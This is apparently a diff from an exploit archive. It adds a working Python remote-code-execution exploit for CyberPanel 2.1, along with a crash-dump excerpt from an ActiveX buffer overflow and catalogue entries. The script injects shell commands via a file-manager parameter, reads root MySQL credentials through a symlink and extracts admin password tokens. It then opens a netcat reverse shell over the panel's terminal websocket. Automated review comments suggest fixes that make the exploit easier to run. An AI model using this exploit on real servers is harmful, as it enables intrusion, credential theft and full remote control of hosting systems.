+00afe47c 41414141 41414141 41414141 41414141 0x41414141 +00afe480 41414141 41414141 41414141 41414141 0x41414141 +00afe484 41414141 41414141 41414141 41414141 0x41414141 +00afe488 41414141 41414141 41414141 41414141 0x41414141 +00afe48c 41414141 41414141 41414141 41414141 0x41414141 +00afe490 41414141 41414141 41414141 41414141 0x41414141 +00afe494 41414141 41414141 41414141 41414141 0x41414141 +00afe498 41414141 41414141 41414141 41414141 0x41414141 +00afe49c 41414141 41414141 41414141 41414141 0x41414141 +00afe4a0 41414141 41414141 41414141 41414141 0x41414141 +00afe4a4 41414141 41414141 41414141 41414141 0x41414141 +00afe4a8 41414141 41414141 41414141 41414141 0x41414141 +00afe4ac 41414141 41414141 41414141 41414141 0x41414141 +00afe4b0 41414141 41414141 41414141 41414141 0x41414141 +00afe4b4 41414141 41414141 41414141 41414141 0x41414141 +00afe4b8 41414141 41414141 41414141 41414141 0x41414141 +00afe4bc 41414141 41414141 41414141 41414141 0x41414141 +00afe4c0 41414141 41414141 41414141 41414141 0x41414141 +00afe4c4 41414141 41414141 41414141 41414141 0x41414141 +00afe4c8 41414141 41414141 41414141 41414141 0x41414141 +00afe4cc 41414141 41414141 41414141 41414141 0x41414141 +00afe4d0 41414141 41414141 41414141 41414141 0x41414141 +00afe4d4 41414141 41414141 41414141 41414141 0x41414141 +00afe4d8 41414141 41414141 41414141 41414141 0x41414141 +00afe4dc 41414141 41414141 41414141 41414141 0x41414141 +00afe4e0 41414141 41414141 41414141 41414141 0x41414141 +00afe4e4 41414141 41414141 41414141 41414141 0x41414141 +00afe4e8 41414141 41414141 41414141 41414141 0x41414141 +00afe4ec 41414141 41414141 41414141 41414141 0x41414141 +00afe4f0 41414141 41414141 41414141 41414141 0x41414141 +00afe4f4 41414141 41414141 41414141 41414141 0x41414141 +00afe4f8 41414141 41414141 41414141 41414141 0x41414141 +00afe4fc 41414141 41414141 41414141 41414141 0x41414141 +00afe500 41414141 41414141 41414141 41414141 0x41414141 +00afe504 41414141 41414141 41414141 41414141 0x41414141 
+00afe508 41414141 41414141 41414141 41414141 0x41414141 +00afe50c 41414141 41414141 41414141 41414141 0x41414141 +00afe510 41414141 41414141 41414141 41414141 0x41414141 +00afe514 41414141 41414141 41414141 41414141 0x41414141 +00afe518 41414141 41414141 41414141 41414141 0x41414141 +00afe51c 41414141 41414141 41414141 41414141 0x41414141 +00afe520 41414141 41414141 41414141 41414141 0x41414141 +00afe524 41414141 41414141 41414141 41414141 0x41414141 +00afe528 41414141 41414141 41414141 41414141 0x41414141 +00afe52c 41414141 41414141 41414141 41414141 0x41414141 +00afe530 41414141 41414141 41414141 41414141 0x41414141 +00afe534 41414141 41414141 41414141 41414141 0x41414141 +00afe538 41414141 41414141 41414141 41414141 0x41414141 +00afe53c 41414141 41414141 41414141 41414141 0x41414141 +00afe540 41414141 41414141 41414141 41414141 0x41414141 +00afe544 41414141 41414141 41414141 41414141 0x41414141 +00afe548 41414141 41414141 41414141 41414141 0x41414141 +00afe54c 41414141 41414141 41414141 41414141 0x41414141 +00afe550 41414141 41414141 41414141 41414141 0x41414141 +00afe554 41414141 41414141 41414141 41414141 0x41414141 +00afe558 41414141 41414141 41414141 41414141 0x41414141 +00afe55c 41414141 41414141 41414141 41414141 0x41414141 +00afe560 41414141 41414141 41414141 41414141 0x41414141 +00afe564 41414141 41414141 41414141 41414141 0x41414141 +00afe568 41414141 41414141 41414141 41414141 0x41414141 +00afe56c 41414141 41414141 41414141 41414141 0x41414141 +00afe570 41414141 41414141 41414141 41414141 0x41414141 +00afe574 41414141 41414141 41414141 41414141 0x41414141 +00afe578 41414141 41414141 41414141 41414141 0x41414141 +00afe57c 41414141 41414141 41414141 41414141 0x41414141 +00afe580 41414141 41414141 41414141 41414141 0x41414141 +00afe584 41414141 41414141 41414141 41414141 0x41414141 +00afe588 41414141 41414141 41414141 41414141 0x41414141 +00afe58c 41414141 41414141 41414141 41414141 0x41414141 +00afe590 41414141 41414141 41414141 41414141 0x41414141 
+00afe594 41414141 41414141 41414141 41414141 0x41414141 +00afe598 41414141 41414141 41414141 41414141 0x41414141 +00afe59c 41414141 41414141 41414141 41414141 0x41414141 +00afe5a0 41414141 41414141 41414141 41414141 0x41414141 +00afe5a4 41414141 41414141 41414141 41414141 0x41414141 +00afe5a8 41414141 41414141 41414141 41414141 0x41414141 +00afe5ac 41414141 41414141 41414141 41414141 0x41414141 +00afe5b0 41414141 41414141 41414141 41414141 0x41414141 +00afe5b4 41414141 41414141 41414141 41414141 0x41414141 +00afe5b8 41414141 41414141 41414141 41414141 0x41414141 +00afe5bc 41414141 41414141 41414141 41414141 0x41414141 +00afe5c0 41414141 41414141 41414141 41414141 0x41414141 +00afe5c4 41414141 41414141 41414141 41414141 0x41414141 +00afe5c8 41414141 41414141 41414141 41414141 0x41414141 +00afe5cc 41414141 41414141 41414141 41414141 0x41414141 +00afe5d0 41414141 41414141 41414141 41414141 0x41414141 +00afe5d4 41414141 41414141 41414141 41414141 0x41414141 +00afe5d8 41414141 41414141 41414141 41414141 0x41414141 +00afe5dc 41414141 41414141 41414141 41414141 0x41414141 +00afe5e0 41414141 41414141 41414141 41414141 0x41414141 +00afe5e4 41414141 41414141 41414141 41414141 0x41414141 +00afe5e8 41414141 41414141 41414141 41414141 0x41414141 +00afe5ec 41414141 41414141 41414141 41414141 0x41414141 +00afe5f0 41414141 41414141 41414141 41414141 0x41414141 +00afe5f4 41414141 41414141 41414141 41414141 0x41414141 + +STACK_COMMAND: ~0s ; .cxr ; kb + +THREAD_SHA1_HASH_MOD_FUNC: 1ff3866701b0a93c59477aaf393ad9182c6cbb4f + +THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 31358b3bd1a2fecfa57be49dd21574669d1b1ea2 + +THREAD_SHA1_HASH_MOD: 2219bd78d12868af57c664db206871e4461019b1 + +FAULT_INSTR_CODE: 12d49989 + +SYMBOL_STACK_INDEX: 0 + +SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+18ee3 + +FOLLOWUP_NAME: MachineOwner + +MODULE_NAME: CNC_Ctrl + +IMAGE_NAME: CNC_Ctrl.DLL + +DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821 + +FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer + 
+BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+18ee3 + +FAILURE_EXCEPTION_CODE: c0000005 + +FAILURE_IMAGE_NAME: CNC_Ctrl.DLL + +BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL + +FAILURE_MODULE_NAME: CNC_Ctrl + +BUCKET_ID_MODULE_STR: CNC_Ctrl + +FAILURE_FUNCTION_NAME: DllUnregisterServer + +BUCKET_ID_FUNCTION_STR: DllUnregisterServer + +BUCKET_ID_OFFSET: 18ee3 + +BUCKET_ID_MODTIMEDATESTAMP: 547ed821 + +BUCKET_ID_MODCHECKSUM: 357a4b + +BUCKET_ID_MODVER_STR: 1.7.0.2 + +BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_ + +FAILURE_PROBLEM_CLASS: APPLICATION_FAULT + +FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer + +WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/wscript.exe/5.812.10240.16384/7159f3df/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/00027da1.htm?Retriage=1 + +TARGET_TIME: 2021-08-12T11:37:22.000Z + +OSBUILD: 19042 + +OSSERVICEPACK: 1023 + +SERVICEPACK_NUMBER: 0 + +OS_REVISION: 0 + +OSPLATFORM_TYPE: x64 + +OSNAME: Windows 10 + +OSEDITION: Windows 10 WinNt SingleUserTS Personal + +USER_LCID: 0 + +OSBUILD_TIMESTAMP: unknown_date + +BUILDDATESTAMP_STR: 160101.0800 + +BUILDLAB_STR: WinBuild + +BUILDOSVER_STR: 10.0.19041.1023 + +ANALYSIS_SESSION_ELAPSED_TIME: 68b2 + +ANALYSIS_SOURCE: UM + +FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver + +FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b} + +Followup: MachineOwner +--------- \ No newline at end of file diff --git a/exploits/multiple/webapps/50230.py b/exploits/multiple/webapps/50230.py new file mode 100755 index 000000000..473531598 --- /dev/null +++ b/exploits/multiple/webapps/50230.py 
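Review bot: The heap-based classification in the title is not supported by the attached evidence: `!exchain` shows the SEH record at 030feab4 overwritten with 41414141, `d esp` and `d ebp` show stack memory filled with the input pattern, and STACK_TEXT is a run of 61616161/41414141 return addresses, all of which describe stack corruption rather than a heap overflow (`IP_ON_HEAP: 61616161` is just the debugger's guess at an address that is in no module). The classification should be justified or changed to match the dump, since it determines which mitigations (stack cookies, SafeSEH/SEHOP versus heap hardening) a reader expects to matter. The advisory also says the overflow is reachable "through several functions" but names none of them, and the PoC area between `--` and `==` is empty, so the affected interface members cannot be scoped for mitigation; the note should either list them or state that they were withheld. The debugger session in the `r` output (PID 5b1c, fault at 10028cf2) is a different run from the `!analyze -v` session (PID 56e4, fault at 10027da1), which is worth stating explicitly so the two are not read as one crash.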
@@ -0,0 +1,203 @@
+# Title: CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)
+# Date: 27.08.2021
+# Author: Numan Türle
+# Vendor Homepage: https://cyberpanel.net/
+# Software Link: https://github.com/usmannasir/cyberpanel
+# Version: <=2.1
+# https://www.youtube.com/watch?v=J_8iLELVgkE
+
+
+#!/usr/bin/python3
+# -*- coding: utf-8 -*-
+# CyberPanel - Remote Code Execution (Authenticated)
+# author: twitter.com/numanturle
+# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE]
+# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password
+
+
+import argparse,requests,warnings,json,re,base64,websocket,ssl,_thread,time
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+from cmd import Cmd
+
+warnings.simplefilter('ignore',InsecureRequestWarning)
+
+def init():
+ parser = argparse.ArgumentParser(description='CyberPanel Remote Code Execution')
+ parser.add_argument('-u','--host',help='Host', type=str, required=True)
+ parser.add_argument('-l', '--login',help='Username', type=str, required=True)
+ parser.add_argument('-p', '--password',help='Password', type=str, required=True)
+ parser.add_argument('-f', '--file',help='File', type=str)
+ args = parser.parse_args()
+ exploit(args)
+
+def exploit(args):
+ def on_open(ws):
+ verifyPath,socket_password
+ print("[+] Socket connection successful")
+ print("[+] Trying a reverse connection")
+ ws.send(json.dumps({"tp":"init","data":{"verifyPath":verifyPath,"password":socket_password}}))
+ ws.send(json.dumps({"tp":"client","data":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1337 >/tmp/f\r","verifyPath":verifyPath,"password":socket_password}))
+ ws.close()
+
+ def on_close(ws, close_status_code, close_msg):
+ print("[+] Successful")
+ print("[!] Disconnect from socket")
+
+
+ session = requests.Session()
+ target = "https://{}:8090".format(args.host)
+ username = args.login
+ password = args.password
+
+ print("[+] Target {}".format(target))
+
+ response = session.get(target, verify=False)
+ session_hand = session.cookies.get_dict()
+ token = session_hand["csrftoken"]
+
+ print("[+] Token {}".format(token))
+
+ headers = {
+ 'X-Csrftoken': token,
+ 'Cookie': 'csrftoken={}'.format(token),
+ 'Referer': target
+ }
+
+ login = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":username,"password":password,"languageSelection":"english"})
+ login_json = json.loads(login.content)
+
+ if login_json["loginStatus"]:
+ session_hand_login = session.cookies.get_dict()
+
+ print("[+] Login Success")
+ print("[+] Send request fetch websites list")
+
+ headers = {
+ 'X-Csrftoken': session_hand_login["csrftoken"],
+ 'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]),
+ 'Referer': target
+ }
+
+ feth_weblist = session.post(target+"/websites/fetchWebsitesList", headers=headers, verify=False, json={"page":1,"recordsToShow":10})
+ feth_weblist_json = json.loads(feth_weblist.content)
+
+ if feth_weblist_json["data"]:
+
+ weblist_json = json.loads(feth_weblist_json["data"])
+ domain = weblist_json[0]["domain"]
+ domain_folder = "/home/{}".format(domain)
+
+ print("[+] Successfully {} selected".format(domain))
+ print("[+] Creating ssh pub")
+
+ remove_ssh_folder = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"path":domain_folder,"method":"deleteFolderOrFile","fileAndFolders":[".ssh"],"domainRandomSeed":"","domainName":domain,"skipTrash":1})
+ create_ssh = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)})
+ create_ssh_json = json.loads(create_ssh.content)
+
+ if create_ssh_json["status"]:
+ key = create_ssh_json["deploymentKey"]
+
+ print("[+] Key : {}".format(key))
+
+ explode_key = key.split()
+ explode_username = explode_key[-1].split("@")
+
+ if explode_username[0]:
+ username = explode_username[0]
+ hostname = explode_username[1]
+
+ print("[+] {} username selected".format(username))
+ print("[+] Preparing for symlink attack")
+ print("[+] Attempting symlink attack with user-level command execution vulnerability #1")
+
+ target_file = args.file
+ if not target_file:
+ target_file = "/root/.my.cnf"
+ domain_folder_ssh = "{}/.ssh".format(domain_folder)
+ command = "rm -rf {}/{}.pub;ln -s {} {}/{}.pub".format(domain_folder_ssh,username,target_file,domain_folder_ssh,username)
+ completeStartingPath = "{}';{};'".format(domain_folder,command)
+
+ #filemanager/controller - completeStartingPath - command execution vulnerability
+
+ symlink = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain})
+ symlink_json = json.loads(symlink.content)
+
+ if symlink_json["status"]:
+ print("[+] [SUDO] Arbitrary file reading via symlink --> {} #2".format(target_file))
+
+ read_file = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)})
+ read_file_json = json.loads(read_file.content)
+ read_file = read_file_json["deploymentKey"]
+ if not args.file:
+ print("-----------------------------------")
+ print(read_file.strip())
+ print("-----------------------------------")
+
+ mysql_password = re.findall('password=\"(.*?)\"',read_file)[0]
+ steal_token = "rm -rf token.txt;mysql -u root -p\"{}\" -D cyberpanel -e \"select token from loginSystem_administrator\" > '{}/token.txt".format(mysql_password,domain_folder)
+
+ print("[+] Fetching users tokens")
+
+ completeStartingPath = "{}';{}".format(domain_folder,steal_token)
+ steal_token_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain})
+ token_file = domain_folder+"/token.txt"
+ steal_token_read_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"fileName":token_file,"method":"readFileContents","domainRandomSeed":"","domainName":domain})
+ leak = json.loads(steal_token_read_request.content)
+ leak = leak["fileContents"].replace("Basic ","").strip().split("\n")[1:]
+ print("------------------------------")
+ for user in leak:
+ b64de = base64.b64decode(user).decode('utf-8')
+ exp_username = b64de.split(":")
+ if exp_username[0] == "admin":
+ admin_password = exp_username[1]
+ print("[+] " + b64de)
+ print("------------------------------")
+ print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
+ print("[+] Try login admin")
+
+ headers = {
+ 'X-Csrftoken': token,
+ 'Cookie': 'csrftoken={}'.format(token),
+ 'Referer': target
+ }
+ login_admin = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":"admin","password":admin_password,"languageSelection":"english"})
+ login_json = json.loads(login_admin.content)
+ if login_json["loginStatus"]:
+ session_hand_login = session.cookies.get_dict()
+
+ print("[+] 4dm1n_l061n_5ucc355")
+ print("[+] c0nn3c71n6_70_73rm1n4l")
+ headers = {
+ 'X-Csrftoken': session_hand_login["csrftoken"],
+ 'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]),
+ 'Referer': target
+ }
+
+ get_websocket_token = session.get(target+"/Terminal", headers=headers, verify=False)
+ verifyPath = re.findall('id=\"verifyPath\">(.*?)',str(get_websocket_token.content))[-1]
+ socket_password = re.findall('id=\"password\">(.*?)',str(get_websocket_token.content))[-1]
+ print("[+] verifyPath {}".format(verifyPath))
+ print("[+] socketPassword {}".format(socket_password))
+ print("[+] Trying to connect to socket")
+ ws = websocket.WebSocketApp("wss://{}:5678".format(args.host),
+ on_open=on_open,
+ on_close=on_close)
+ ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
+
+ else:
+ print("[-] Auto admin login failed")
+ else:
+ print(read_file)
+ else:
+ print("[-] Unexpected")
+ else:
+ print("[-] Username selected failed")
+ else:
+ print("[-] Fail ssh pub")
+ else:
+ print("[-] List error")
+ else:
+ print("[-] AUTH : Login failed msg: {}".format(login_json["error_message"]))
+
+if __name__ == "__main__":
+ init()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 077fe38f2..ccd72602f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44354,3 +44354,6 @@ id,file,description,date,author,type,platform,port
 50227,exploits/hardware/webapps/50227.py,"HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)",2021-08-25,"Tyler Butler",webapps,hardware,
 50228,exploits/php/webapps/50228.py,"Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)",2021-08-25,"Justin White",webapps,php,
 50229,exploits/multiple/webapps/50229.txt,"ProcessMaker 3.5.4 - Local File inclusion",2021-08-26,"Ai Ho",webapps,multiple,
+50230,exploits/multiple/webapps/50230.py,"CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)",2021-08-27,"numan türle",webapps,multiple,
+50231,exploits/hardware/webapps/50231.txt,"COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow",2021-08-27,LiquidWorm,webapps,hardware,
+50232,exploits/hardware/webapps/50232.txt,"COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow",2021-08-27,LiquidWorm,webapps,hardware,
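Review bot: The `#!/usr/bin/python3` line is on line 10 of the new file, below the `# Title:` header block, so although the file is added with mode 100755 the interpreter directive is inert and a direct `./50230.py` invocation is not handed to python3; move it (together with the `# -*- coding: utf-8 -*-` line) to the first two lines. `_thread`, `time` and `Cmd` are imported but never used, and `websocket` (the third-party websocket-client package) is a requirement the header never states, so a `# Requirements: requests, websocket-client` line next to `# Version:` would save readers a failed import. The bare expression `verifyPath,socket_password` at the top of `on_open` is a no-op — the closure already resolves those names from the enclosing `exploit` scope at call time — so either delete it or replace it with a comment such as `# verifyPath / socket_password are closed over from exploit()`. The eight-level `if`/`else` nesting in `exploit`, with `headers` rebound three times along the way, makes the `[-]` failure branches at the bottom hard to match to their checks; returning early on each failure would flatten it.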